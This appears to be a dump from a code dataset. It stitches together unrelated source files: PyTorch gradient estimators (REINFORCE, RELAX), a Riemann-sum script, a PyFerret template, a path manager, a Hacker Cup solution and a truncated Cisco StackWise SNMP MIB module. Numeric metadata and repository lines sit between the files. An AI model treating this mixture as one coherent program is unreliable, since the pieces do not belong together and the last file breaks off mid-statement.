class ProbabilityDistribution(Function):
    """A Function that can also sample from itself via ``draw``."""

    def draw(self, *args, **kwargs):
        raise NotImplementedError


class BernoulliDistribution(ProbabilityDistribution):
    """Bernoulli distribution parameterized directly by probability theta."""

    def __init__(self, theta):
        self.theta = theta

    def __call__(self, b):
        # Pointwise likelihood theta^b * (1-theta)^(1-b); the 1E-8 terms
        # guard against 0**0-style numerical issues at the boundaries.
        return (self.theta + 1E-8)**b * (1 - self.theta + 1E-8)**(1 - b)

    def draw(self):
        # Clamp to [0, 1] so bernoulli() receives valid probabilities.
        return self.theta.clamp(0, 1).bernoulli()


class SoftBernoulliDistribution(ProbabilityDistribution):
    """Bernoulli distribution parameterized by logits (theta is passed
    through a sigmoid before being used as a probability)."""

    def __init__(self, theta):
        self.theta = theta

    def __call__(self, b):
        return (self.theta.sigmoid() + 1E-8)**b * (1 - self.theta.sigmoid() + 1E-8)**(1 - b)

    def draw(self):
        return self.theta.sigmoid().bernoulli()


class GradientEstimator(Function):
    """Base class for stochastic gradient estimators; calling the object
    delegates to ``estimate_gradient``."""

    def estimate_gradient(self, *args):
        raise NotImplementedError

    def __call__(self, *args):
        return self.estimate_gradient(*args)


class ConcreteRelaxation(Function):
    """Deterministic part of the Concrete/Gumbel-softmax relaxation:
    sigmoid(z / temp). Lower temperatures approach a hard threshold."""

    def __init__(self, temp):
        self.temp = temp

    def __call__(self, z):
        return (z / self.temp).sigmoid()


class BernoulliRelaxation(ProbabilityDistribution):
    """Reparameterized sampler for relaxed Bernoulli variables.

    ``draw`` returns (logit(theta) + logit(u), u) where u ~ Uniform(0, 1),
    i.e. the standard z = log(theta/(1-theta)) + log(u/(1-u)) construction.
    """

    def __init__(self, theta):
        self.theta = theta

    def __call__(self, b):
        raise NotImplementedError

    def draw(self):
        theta = self.theta.sigmoid()
        u = theta.clone().uniform_()
        l1 = theta.log() - (1 - theta).log()
        l2 = u.log() - (1 - u).log()
        return l1 + l2, u


class ConditionedBernoulliRelaxation(BernoulliRelaxation):
    """Relaxed Bernoulli sampler conditioned on an observed hard sample b
    (the z-tilde draw used by REBAR/RELAX)."""

    def __call__(self, b):
        raise NotImplementedError

    def draw(self, b):
        theta = self.theta.sigmoid()
        v = theta.clone().uniform_()
        t1 = 1 - theta
        # Rescale the uniform noise into the region consistent with b:
        # v*(1-theta) when b == 0, v*theta + (1-theta) when b == 1.
        v = (v * t1) * (1 - b) + (v * theta + t1) * b
        l1 = theta.log() - t1.log()
        l2 = v.log() - (1 - v).log()
        return l1 + l2, v


class Heaviside(Function):
    """Hard threshold: 1 for x > 0, else 0 (via clamp to [0,1] then ceil)."""

    def __call__(self, x):
        return x.clamp(0, 1).ceil()


class Round(Function):
    """Elementwise rounding to the nearest integer."""

    def __call__(self, x):
        return x.round()


class REINFORCEEstimator(GradientEstimator):
    """Score-function (REINFORCE) gradient estimator: grad = f(b) * dlog p(b)/dtheta."""

    def __init__(self, f, p):
        self.f = f
        self.p = p

    def estimate_gradient(self, theta, b=None):
        # Sample b from p unless the caller supplies a fixed sample.
        b = self.p.draw() if b is None else b
        p = self.p(b)
        f_b = self.f(b)
        # apply_fn presumably maps the autograd call over a nested parameter
        # structure (imported from .nested) — TODO confirm its contract.
        dlogp_dtheta = theta.apply_fn(lambda x, out: ag.grad([out.sum()], [x])[0], p.log())
        return dlogp_dtheta * f_b


"""
REINFORCE with Importance Sampling Estimator
"""
class RISEEstimator(GradientEstimator):
    """Importance-sampled REINFORCE: samples come from proposal p_i, the
    estimate is reweighted by 1/p_i, and a variance gradient w.r.t. the
    proposal parameters pi is returned alongside."""

    def __init__(self, f, p, p_i, transform_fn=None):
        self.f = f
        self.p = p
        self.p_i = p_i
        self.transform_fn = transform_fn

    def estimate_gradient(self, theta, pi, b=None):
        b = self.p_i.draw() if b is None else b
        # Optionally map the raw sample into the space f and p expect.
        h = b.apply_fn(self.transform_fn) if self.transform_fn else b
        p = self.p(h)
        p_i = self.p_i(b)
        f_b = self.f(h)
        dp_dtheta = theta.apply_fn(lambda x, out: ag.grad([out.sum()], [x])[0], p)
        # 1E-8 guards against division by a zero proposal probability.
        g_is = dp_dtheta * f_b / (p_i + 1E-8)
        # Gradient of the (squared) estimator w.r.t. proposal params — used
        # to minimize estimator variance.
        var_grad = pi.apply_fn(lambda x, out: ag.grad([out.sum()], [x], retain_graph=True)[0], g_is**2)
        return g_is, var_grad


"""
Implements RELAX estimator from "Backpropagation Through the Void..." paper
https://arxiv.org/abs/1711.00123
Grathwohl et al. (2018)
"""
class RELAXEstimator(GradientEstimator):
    """RELAX gradient estimator.

    f  - objective evaluated on hard samples b = H(z)
    c  - learned control variate c_phi
    p  - discrete distribution p(b)
    z  - unconditional relaxed sampler (BernoulliRelaxation-like)
    z_tilde - sampler conditioned on b (ConditionedBernoulliRelaxation-like)
    H  - hard-threshold function mapping z to b
    """

    def __init__(self, f, c, p, z, z_tilde, H, transform_fn=None):
        self.f = f
        self.c = c
        self.p = p
        self.z = z
        self.z_tilde = z_tilde
        self.transform_fn = transform_fn
        self.H = H

    def estimate_gradient(self, theta, phi):
        # z, u: relaxed sample and its underlying uniform noise.
        z, u = self.z.draw()
        b = self.H(z)
        # zt, v: relaxed sample conditioned on the hard sample b.
        zt, v = self.z_tilde.draw(b)
        p = self.p(b)
        c_phi_zt = self.c(theta, v)
        # retain_graph=True because the same graph is differentiated again
        # below for the control-variate terms and the phi gradient.
        dlogp_dtheta = theta.apply_fn(lambda x, out: ag.grad([out.sum()], [x], retain_graph=True)[0], p.log())
        c_phi_z = self.c(theta, u)
        dc_phi_z = theta.apply_fn(lambda x: ag.grad([c_phi_z], [x], retain_graph=True)[0])
        dc_phi_zt = theta.apply_fn(lambda x: ag.grad([c_phi_zt], [x], retain_graph=True)[0])
        # Eq. (2)/(3) of Grathwohl et al.: score term with control variate
        # subtracted, plus the reparameterized correction terms.
        g_relax = dlogp_dtheta * (self.f(b) - c_phi_zt) + dc_phi_z - dc_phi_zt
        var_estimate = (g_relax**2)
        # Train phi to minimize the variance of the estimator.
        phi_grad = phi.apply_fn(lambda x, y: ag.grad([y.sum()], [x], retain_graph=True)[0], var_estimate)
        # Free retained graphs promptly; this loop can hold a lot of memory.
        gc.collect()
        return g_relax, phi_grad
29.89697
110
0.612204
707
4,933
4.055163
0.168317
0.059644
0.038368
0.034182
0.436693
0.346355
0.267178
0.218347
0.218347
0.169515
0
0.01546
0.252585
4,933
164
111
30.079268
0.762137
0
0
0.274194
0
0
0
0
0
0
0
0
0
1
0.217742
false
0
0.072581
0.072581
0.516129
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
00646f075a36206f708e4585f25c0a0bcf2de3e2
484
py
Python
Exercises/Riemann.py
JoeyDeSmet/Algorithm-intro
dd897c8ed33c6233450fe4fa3eacd474ede0aec1
[ "Apache-2.0" ]
null
null
null
Exercises/Riemann.py
JoeyDeSmet/Algorithm-intro
dd897c8ed33c6233450fe4fa3eacd474ede0aec1
[ "Apache-2.0" ]
null
null
null
Exercises/Riemann.py
JoeyDeSmet/Algorithm-intro
dd897c8ed33c6233450fe4fa3eacd474ede0aec1
[ "Apache-2.0" ]
1
2021-10-14T08:03:41.000Z
2021-10-14T08:03:41.000Z
import math def f(x): return math.pow(x, 2) + 3 * x + 15 def riemannIntegral(interval, a): x = interval[0] step = (interval[1] - interval[0]) / a x1 = x + step integral = 0 for i in range (interval[0], a): width = x1 - x height = f(x1) integral += width * height x = x1 x1 = x + step return integral print(riemannIntegral([0, 5], 5)) print(riemannIntegral([0, 5], 8)) print(riemannIntegral([0, 5], 1_000_000))
19.36
42
0.553719
71
484
3.746479
0.394366
0.101504
0.236842
0.24812
0
0
0
0
0
0
0
0.085799
0.301653
484
25
43
19.36
0.701183
0
0
0.111111
0
0
0
0
0
0
0
0
0
1
0.111111
false
0
0.055556
0.055556
0.277778
0.166667
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
0070e3db28342011ad26dad5be9905665020e271
3,282
py
Python
external_functions/pyef/template.py
josborne-noaa/PyFerret
8496508e9902c0184898522e9f89f6caea6d4539
[ "Unlicense" ]
44
2016-03-18T22:05:31.000Z
2021-12-23T01:50:09.000Z
external_functions/pyef/template.py
josborne-noaa/PyFerret
8496508e9902c0184898522e9f89f6caea6d4539
[ "Unlicense" ]
88
2016-08-19T08:05:37.000Z
2022-03-28T23:29:21.000Z
external_functions/pyef/template.py
josborne-noaa/PyFerret
8496508e9902c0184898522e9f89f6caea6d4539
[ "Unlicense" ]
24
2016-02-07T18:12:06.000Z
2022-02-19T09:06:17.000Z
'''
Template for creating a PyFerret Python External Function (PyEF).

The names of the functions provided should not be changed. By default,
PyFerret uses the name of the module as the function name. Copy this file
under the name you want the function to have, then edit the bodies and
comments as desired.
'''

import numpy

def ferret_init(efid):
    '''
    Initialization function for this PyFerret PyEF.

    Returns a dictionary describing this PyEF's features. At minimum it
    assigns the expected number of arguments and a description of the
    function; descriptions of the arguments and a non-standard result
    grid specification may also be provided.
    '''
    return {
        "numargs": 1,
        "descript": "Pass through",
    }

def ferret_result_limits(efid):
    '''
    Defines the index limits for all abstract axes in the result grid.

    Returns an (X,Y,Z,T,E,F) six-tuple whose entries are integer
    (low, high) pairs for abstract axes or None for non-abstract axes.
    Delete this function if the result grid has no abstract axes.
    '''
    return (None,) * 6

def ferret_custom_axes(efid):
    '''
    Defines all custom axes in the result grid.

    Returns an (X,Y,Z,T,E,F) six-tuple whose entries are
    (low, high, delta, unit_name, is_modulo) tuples for custom axes or
    None for non-custom axes; low/high/delta are floats in world
    coordinates. Delete this function if there are no custom axes.
    '''
    return (None,) * 6

def ferret_compute(efid, result, result_bdf, inputs, input_bdfs):
    '''
    Computation function for this PyFerret PyEF.

    Assign values into the elements of result (e.g. 'result[...] = ...');
    never rebind result itself, which would merely create a local variable
    hiding the array passed in. Raise ValueError for unexpected values or
    IndexError for unexpected array sizes if an error is detected.

    Arguments:
        result     - numpy float array to be assigned
        result_bdf - one-element numpy float array giving the
                     missing-data value for result
        inputs     - tuple of read-only numpy float arrays with the
                     caller-provided input values
        input_bdfs - one-element read-only numpy float arrays giving the
                     missing-data value for each corresponding input
    '''
    # Split the first input into missing and valid positions, then copy
    # valid values through and stamp the result missing-value elsewhere.
    missing = (inputs[0] == input_bdfs[0])
    valid = ~missing
    result[valid] = inputs[0][valid]
    result[missing] = result_bdf
    return
37.724138
75
0.694089
488
3,282
4.608607
0.366803
0.035571
0.042686
0.042686
0.232992
0.163628
0.130725
0.130725
0.067586
0.067586
0
0.001611
0.243449
3,282
86
76
38.162791
0.904148
0.743754
0
0
0
0
0.041411
0
0
0
0
0
0
1
0.222222
false
0.055556
0.055556
0
0.5
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
1
0
0
0
0
0
2
008a94b66bc880792cadcf97f6f2be20449badcd
2,221
py
Python
src/ham/util/path_manager.py
n2qzshce/ham_radio_sync
ffe95a4ef88375b5d5e4503cf770e884644536cd
[ "CNRI-Python", "RSA-MD" ]
8
2021-03-01T17:28:45.000Z
2022-02-10T02:19:41.000Z
src/ham/util/path_manager.py
n2qzshce/ham_radio_sync
ffe95a4ef88375b5d5e4503cf770e884644536cd
[ "CNRI-Python", "RSA-MD" ]
7
2021-03-31T03:37:12.000Z
2021-06-12T20:30:05.000Z
src/ham/util/path_manager.py
n2qzshce/ham_radio_sync
ffe95a4ef88375b5d5e4503cf770e884644536cd
[ "CNRI-Python", "RSA-MD" ]
1
2021-02-24T21:39:51.000Z
2021-02-24T21:39:51.000Z
import os


class PathManager:
    """Class-level registry of input/output/import paths for the sync tool.

    All state is stored on the class itself (no instances are created);
    optional UI label objects, when registered, have their ``.text``
    updated whenever the corresponding folder path changes.
    """

    # Optional UI labels mirroring the chosen folders (may stay None).
    input_folder_label = None
    output_folder_label = None
    # Absolute folder/file paths managed by the class.
    _input_folder_path = None
    _output_folder_path = None
    _import_file_path = None
    _import_file_style = None

    @classmethod
    def set_input_folder_label(cls, label):
        """Register the UI label that mirrors the input folder path."""
        cls.input_folder_label = label

    @classmethod
    def set_output_folder_label(cls, label):
        """Register the UI label that mirrors the output folder path."""
        cls.output_folder_label = label

    @classmethod
    def get_input_path(cls, file_name=None):
        """Return the input folder path, or a path to file_name inside it."""
        result = cls._input_folder_path
        if file_name is not None:
            result = os.path.join(cls._input_folder_path, file_name)
        return result

    @classmethod
    def get_output_path(cls, file_name=None):
        """Return the output folder path, or a path to file_name inside it."""
        result = cls._output_folder_path
        if file_name is not None:
            result = os.path.join(cls._output_folder_path, file_name)
        return result

    @classmethod
    def set_input_path(cls, path):
        """Set the input folder (stored absolute) and refresh its label."""
        cls._input_folder_path = os.path.abspath(path)
        if cls.input_folder_label is not None:
            cls.input_folder_label.text = f"Input folder: {cls._input_folder_path}"

    @classmethod
    def set_output_path(cls, path):
        """Set the output folder (stored absolute) and refresh its label."""
        cls._output_folder_path = os.path.abspath(path)
        if cls.output_folder_label is not None:
            cls.output_folder_label.text = f"Output folder: {cls._output_folder_path}"

    @classmethod
    def input_path_exists(cls, path=None):
        """Check whether the input folder (or path inside it) exists."""
        all_path = cls.get_input_path(path)
        return os.path.exists(all_path)

    @classmethod
    def output_path_exists(cls, path=None):
        """Check whether the output folder (or path inside it) exists.

        Consistency fix: ``path`` now defaults to None like
        ``input_path_exists`` (backward-compatible — existing callers that
        pass a path are unaffected).
        """
        all_path = cls.get_output_path(path)
        return os.path.exists(all_path)

    @classmethod
    def open_input_file(cls, file_name, mode):
        """Open file_name inside the input folder with the given mode."""
        full_path = os.path.join(cls.get_input_path(), file_name)
        return cls._open_file(full_path, mode)

    @classmethod
    def open_output_file(cls, file_name, mode):
        """Open file_name inside the output folder with the given mode."""
        full_path = os.path.join(cls.get_output_path(), file_name)
        return cls._open_file(full_path, mode)

    @classmethod
    def set_import_file(cls, file_name, style):
        """Record the import file (stored absolute) and its radio style."""
        full_path = os.path.abspath(file_name)
        cls._import_file_path = full_path
        cls._import_file_style = style

    @classmethod
    def get_import_path(cls):
        """Return the absolute path of the registered import file."""
        return cls._import_file_path

    @classmethod
    def get_import_style(cls):
        """Return the style recorded for the registered import file."""
        return cls._import_file_style

    @classmethod
    def _open_file(cls, file_name, mode):
        # All files are opened UTF-8 with Unix newlines for portability.
        return open(f'{file_name}', f'{mode}', encoding='utf-8', newline='\n')
25.528736
77
0.767672
352
2,221
4.474432
0.105114
0.124444
0.062222
0.045714
0.512381
0.406349
0.377143
0.341587
0.245079
0.245079
0
0.000521
0.135975
2,221
86
78
25.825581
0.820219
0
0
0.333333
0
0
0.045925
0.022062
0
0
0
0
0
1
0.212121
false
0
0.151515
0.045455
0.606061
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
008cde908d293c007a270cb3365f701251d7f2a1
1,313
py
Python
2013/QualificationRound/problem1.py
radeinla/fbhackercup
11c30a77cac8c4fc542eba23d0b080cbb0f4ece9
[ "MIT" ]
null
null
null
2013/QualificationRound/problem1.py
radeinla/fbhackercup
11c30a77cac8c4fc542eba23d0b080cbb0f4ece9
[ "MIT" ]
null
null
null
2013/QualificationRound/problem1.py
radeinla/fbhackercup
11c30a77cac8c4fc542eba23d0b080cbb0f4ece9
[ "MIT" ]
null
null
null
def is_black(x): return x == '#' def is_square(box, N): size = None fbj1 = None fbj2 = None fbi1 = None fbi2 = None blank = "."*N for i in xrange(0, N): for j in xrange(0, N): if fbj1 is None or fbj2 is None: if is_black(box[i][j]): if fbj1 is None: fbj1 = j fbi1 = i elif j == N-1: fbj2 = j fbi2 = fbi1 + fbj2 - fbj1 else: if fbj1 is not None: fbj2 = j-1 fbi2 = fbi1 + fbj2 - fbj1 else: if is_black(box[i][j]): if (j < fbj1 or j > fbj2) or i - fbi1 > fbj2 - fbj1: return False else: if fbj1 <= j <= fbj2 and i - fbi1 <= fbj2 - fbj1: return False return fbj1 is not None with open("input1.txt") as f: T = int(f.readline()) for t in xrange(0, T): N = int(f.readline()) c = [] for i in xrange(0, N): c.append(f.readline().rstrip('\n')) print "Case #%d: %s" % (t+1, "YES" if is_square(c, N) else "NO")
28.543478
72
0.374714
164
1,313
2.969512
0.286585
0.065708
0.073922
0.061602
0.308008
0.308008
0.065708
0
0
0
0
0.061611
0.517898
1,313
45
73
29.177778
0.707741
0
0
0.275
0
0
0.023628
0
0
0
0
0
0
0
null
null
0
0
null
null
0.025
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
2
0094f3b130364ae0c13120be09b4683745e6005c
69,805
py
Python
pysnmp-with-texts/CISCO-STACKWISE-MIB.py
agustinhenze/mibs.snmplabs.com
1fc5c07860542b89212f4c8ab807057d9a9206c7
[ "Apache-2.0" ]
8
2019-05-09T17:04:00.000Z
2021-06-09T06:50:51.000Z
pysnmp-with-texts/CISCO-STACKWISE-MIB.py
agustinhenze/mibs.snmplabs.com
1fc5c07860542b89212f4c8ab807057d9a9206c7
[ "Apache-2.0" ]
4
2019-05-31T16:42:59.000Z
2020-01-31T21:57:17.000Z
pysnmp-with-texts/CISCO-STACKWISE-MIB.py
agustinhenze/mibs.snmplabs.com
1fc5c07860542b89212f4c8ab807057d9a9206c7
[ "Apache-2.0" ]
10
2019-04-30T05:51:36.000Z
2022-02-16T03:33:41.000Z
# # PySNMP MIB module CISCO-STACKWISE-MIB (http://snmplabs.com/pysmi) # ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CISCO-STACKWISE-MIB # Produced by pysmi-0.3.4 at Wed May 1 12:13:00 2019 # On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4 # Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15) # ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer") NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues") ValueRangeConstraint, ConstraintsUnion, SingleValueConstraint, ConstraintsIntersection, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "ConstraintsUnion", "SingleValueConstraint", "ConstraintsIntersection", "ValueSizeConstraint") ciscoMgmt, = mibBuilder.importSymbols("CISCO-SMI", "ciscoMgmt") EntPhysicalIndexOrZero, = mibBuilder.importSymbols("CISCO-TC", "EntPhysicalIndexOrZero") entPhysicalIndex, = mibBuilder.importSymbols("ENTITY-MIB", "entPhysicalIndex") ifIndex, = mibBuilder.importSymbols("IF-MIB", "ifIndex") SnmpAdminString, = mibBuilder.importSymbols("SNMP-FRAMEWORK-MIB", "SnmpAdminString") NotificationGroup, ObjectGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ObjectGroup", "ModuleCompliance") NotificationType, Integer32, ObjectIdentity, TimeTicks, Counter32, MibIdentifier, Gauge32, MibScalar, MibTable, MibTableRow, MibTableColumn, iso, Bits, Counter64, ModuleIdentity, IpAddress, Unsigned32 = mibBuilder.importSymbols("SNMPv2-SMI", "NotificationType", "Integer32", "ObjectIdentity", "TimeTicks", "Counter32", "MibIdentifier", "Gauge32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "iso", "Bits", "Counter64", "ModuleIdentity", "IpAddress", "Unsigned32") DisplayString, TextualConvention, TruthValue, MacAddress = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention", "TruthValue", "MacAddress") ciscoStackWiseMIB = 
ModuleIdentity((1, 3, 6, 1, 4, 1, 9, 9, 500)) ciscoStackWiseMIB.setRevisions(('2016-04-16 00:00', '2015-11-24 00:00', '2011-12-12 00:00', '2010-02-01 00:00', '2008-06-10 00:00', '2005-10-12 00:00',)) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): if mibBuilder.loadTexts: ciscoStackWiseMIB.setRevisionsDescriptions(('Added following objects in cswGlobals - cswStackDomainNum - cswStackType - cswStackBandWidth Created following tables - cswDistrStackLinkInfoTable -cswDistrStackPhyPortInfoTable Added cswStatusGroupRev2 Deprecated cswStatusGroupRev1 Added cswDistrStackLinkStatusGroup Added cswDistrStackPhyPortStatusGroup Added cswStackWiseMIBComplianceRev4 MIB COMPLIANCE Deprecated cswStackWiseMIBComplianceRev3 MIB COMPLIANCE.', 'Added following Objects in cswSwitchInfoTable - cswSwitchPowerAllocated Added following OBJECT-GROUP - cswStackPowerAllocatedGroup Deprecated cswStackWiseMIBComplianceRev2 MODULE-COMPLIANCE. Added cswStackWiseMIBComplianceRev3 MODULE-COMPLIANCE.', "Modified 'cswSwitchRole' object.", 'Added cswStackPowerStatusGroup, cswStackPowerSwitchStatusGroup, cswStackPowerPortStatusGroup, cswStatusGroupRev1 and cswStackPowerNotificationGroup. Deprecated cswStackWiseMIBCompliance compliance statement. Added cswStackWiseMIBComplianceRev1 compliance statement. Deprecated cswStatusGroup because we deprecated cswEnableStackNotifications', "Modified 'cswSwitchState' object.", 'Initial version of this MIB module.',)) if mibBuilder.loadTexts: ciscoStackWiseMIB.setLastUpdated('201604160000Z') if mibBuilder.loadTexts: ciscoStackWiseMIB.setOrganization('Cisco Systems, Inc.') if mibBuilder.loadTexts: ciscoStackWiseMIB.setContactInfo('Cisco Systems Customer Service Postal: 170 W Tasman Drive San Jose, CA 95134 Tel: +1 800 553-NETS E-mail: cs-dsbu@cisco.com') if mibBuilder.loadTexts: ciscoStackWiseMIB.setDescription('This MIB module contain a collection of managed objects that apply to network devices supporting the Cisco StackWise(TM) technology. 
The StackWise technology provides a method for collectively utilizing a stack of switches to create a single switching unit. The data stack is used for switching data packets and, in power stack, switches are connected by special stack power cables to share power. Moreover, stackwise is the concept for combining multiple systems to give an impression of a single system so that is why both power stack and data stack are supported by single MIB. Terminology: Stack - A collection of switches connected by the Cisco StackWise technology. Master - The switch that is managing the stack. Member - A switch in the stack that is NOT the stack master. Ring - Components that makes up the connections between the switches in order to create a stack. Stackport - A special physical connector used by the ring. It is possible for a switch have more than one stackport. SDM - Switch Database Management. Stack Power - A collection of switches connected by special stack power cables to share the power of inter-connected power supplies across all switches requiring power. Stack Power is managed by a single data stack. Jack-Jack - It is a device that provides the Power Shelf capabilities required for Stack Power on the high-end. POE - Power Over Ethernet FEP - Front End Power Supply SOC - Sustained Overload Condition GLS - Graceful Load Shedding ILS - Immediate Load Shedding SRLS - System Ring Load Shedding SSLS - System Star Load Shedding') class CswPowerStackMode(TextualConvention, Integer32): description = 'This textual convention is used to describe the mode of the power stack. Since the power stack could only run in either power sharing or redundant mode so this TC will also have only following valid values, powerSharing(1) :When a power stack is running in power sharing mode then all the power supplies in the power stack contributes towards the global power budget of the stack. 
redundant(2) :If the user wants the power stack to run in redundant mode then we will take the capacity of the largest power supply in the power stack out of power stack global power budget pool. powerSharingStrict(3):This mode is same as power sharing mode but, in this mode, the available power will always be more than the used power. redundantStrict(4) :This mode is same as redundant mode but, in this mode, the available power will always be more than the used power.' status = 'current' subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4)) namedValues = NamedValues(("powerSharing", 1), ("redundant", 2), ("powerSharingStrict", 3), ("redundantStrict", 4)) class CswPowerStackType(TextualConvention, Integer32): description = 'This textual conventions is used to describe the type of the power stack. Since the power stack could only be configured in a ring or star topology so this TC will have only following valid values, ring(1): The power stack has been formed by connecting the switches in ring topology. star(2): The power stack has been formed by connecting the switches in star topology.' status = 'current' subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2)) namedValues = NamedValues(("ring", 1), ("star", 2)) ciscoStackWiseMIBNotifs = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 500, 0)) ciscoStackWiseMIBObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 500, 1)) ciscoStackWiseMIBConform = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 500, 2)) cswGlobals = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 1)) cswStackInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2)) cswStackPowerInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3)) class CswSwitchNumber(TextualConvention, Unsigned32): description = 'A unique value, greater than zero, for each switch in a group of stackable switches.' 
status = 'current' displayHint = 'd' subtypeSpec = Unsigned32.subtypeSpec + ValueRangeConstraint(1, 4294967295) class CswSwitchNumberOrZero(TextualConvention, Unsigned32): description = 'A unique value, greater than or equal to zero, for each switch in a group of stackable switches. A value of zero means that the switch number can not be determined. The value of zero is not unique.' status = 'current' displayHint = 'd' subtypeSpec = Unsigned32.subtypeSpec + ValueRangeConstraint(0, 4294967295) class CswSwitchPriority(TextualConvention, Unsigned32): description = 'A value, greater than or equal to zero, that defines the priority of a switch in a group of stackable switches. The higher the value, the higher the priority.' status = 'current' displayHint = 'd' subtypeSpec = Unsigned32.subtypeSpec + ValueRangeConstraint(0, 4294967295) cswMaxSwitchNum = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 1, 1), CswSwitchNumber()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswMaxSwitchNum.setStatus('current') if mibBuilder.loadTexts: cswMaxSwitchNum.setDescription('The maximum number of switches that can be configured on this stack. This is also the maximum value that can be set by the cswSwitchNumNextReload object.') cswMaxSwitchConfigPriority = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 1, 2), CswSwitchPriority()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswMaxSwitchConfigPriority.setStatus('current') if mibBuilder.loadTexts: cswMaxSwitchConfigPriority.setDescription('The maximum configurable priority for a switch in this stack. Highest value equals highest priority. 
This is the highest value that can be set by the cswSwitchSwPriority object.') cswRingRedundant = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 1, 3), TruthValue()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswRingRedundant.setStatus('current') if mibBuilder.loadTexts: cswRingRedundant.setDescription("A value of 'true' is returned when the stackports are connected in such a way that it forms a redundant ring.") cswStackPowerInfoTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 1), ) if mibBuilder.loadTexts: cswStackPowerInfoTable.setStatus('current') if mibBuilder.loadTexts: cswStackPowerInfoTable.setDescription('This table holds the information about all the power stacks in a single data stack.') cswStackPowerInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 1, 1), ).setIndexNames((0, "CISCO-STACKWISE-MIB", "cswStackPowerStackNumber")) if mibBuilder.loadTexts: cswStackPowerInfoEntry.setStatus('current') if mibBuilder.loadTexts: cswStackPowerInfoEntry.setDescription('An entry in the cswStackPowerInfoTable for each of the power stacks in a single data stack. This entry contains information regarding the power stack.') cswStackPowerStackNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 1, 1, 1), Unsigned32()) if mibBuilder.loadTexts: cswStackPowerStackNumber.setStatus('current') if mibBuilder.loadTexts: cswStackPowerStackNumber.setDescription('A unique value, greater than zero, to identify a power stack.') cswStackPowerMode = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 1, 1, 2), CswPowerStackMode()).setMaxAccess("readwrite") if mibBuilder.loadTexts: cswStackPowerMode.setStatus('current') if mibBuilder.loadTexts: cswStackPowerMode.setDescription('This object specifies the information about the mode of the power stack. Power-sharing mode: All of the input power can be used for loads, and the total available power appears as one huge power supply. The power budget includes all power from all supplies. 
No power is set aside for power supply failures, so if a power supply fails, load shedding (shutting down of powered devices or switches) might occur. This is the default. Redundant mode: The largest power supply is removed from the power pool to be used as backup power in case one of the other power supplies fails. The available power budget is the total power minus the largest power supply. This reduces the available power in the pool for switches and powered devices to draw from, but in case of a failure or an extreme power load, there is less chance of having to shut down switches or powered devices. This is the recommended operating mode if your system has enough power. In addition, you can configure each mode to run a strict power budget or a non-strict (loose) power budget. If the mode is strict, the stack power needs cannot exceed the available power. When the power budgeted to devices reaches the maximum available PoE power, power is denied to the next device seeking power. In this mode the stack never goes into an over-budgeted power mode. When the mode is non-strict, budgeted power is allowed to exceed available power. 
This is normally not a problem because most devices do not run at full power and the chances of all powered devices in the stack requiring maximum power at the same time is small.') cswStackPowerMasterMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 1, 1, 3), MacAddress()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswStackPowerMasterMacAddress.setStatus('current') if mibBuilder.loadTexts: cswStackPowerMasterMacAddress.setDescription('This object indicates the Mac address of the power stack master.') cswStackPowerMasterSwitchNum = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 1, 1, 4), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswStackPowerMasterSwitchNum.setStatus('current') if mibBuilder.loadTexts: cswStackPowerMasterSwitchNum.setDescription('This object indicates the switch number of the power stack master. The value of this object would be zero if the power stack master is not part of this data stack.') cswStackPowerNumMembers = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 1, 1, 5), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswStackPowerNumMembers.setStatus('current') if mibBuilder.loadTexts: 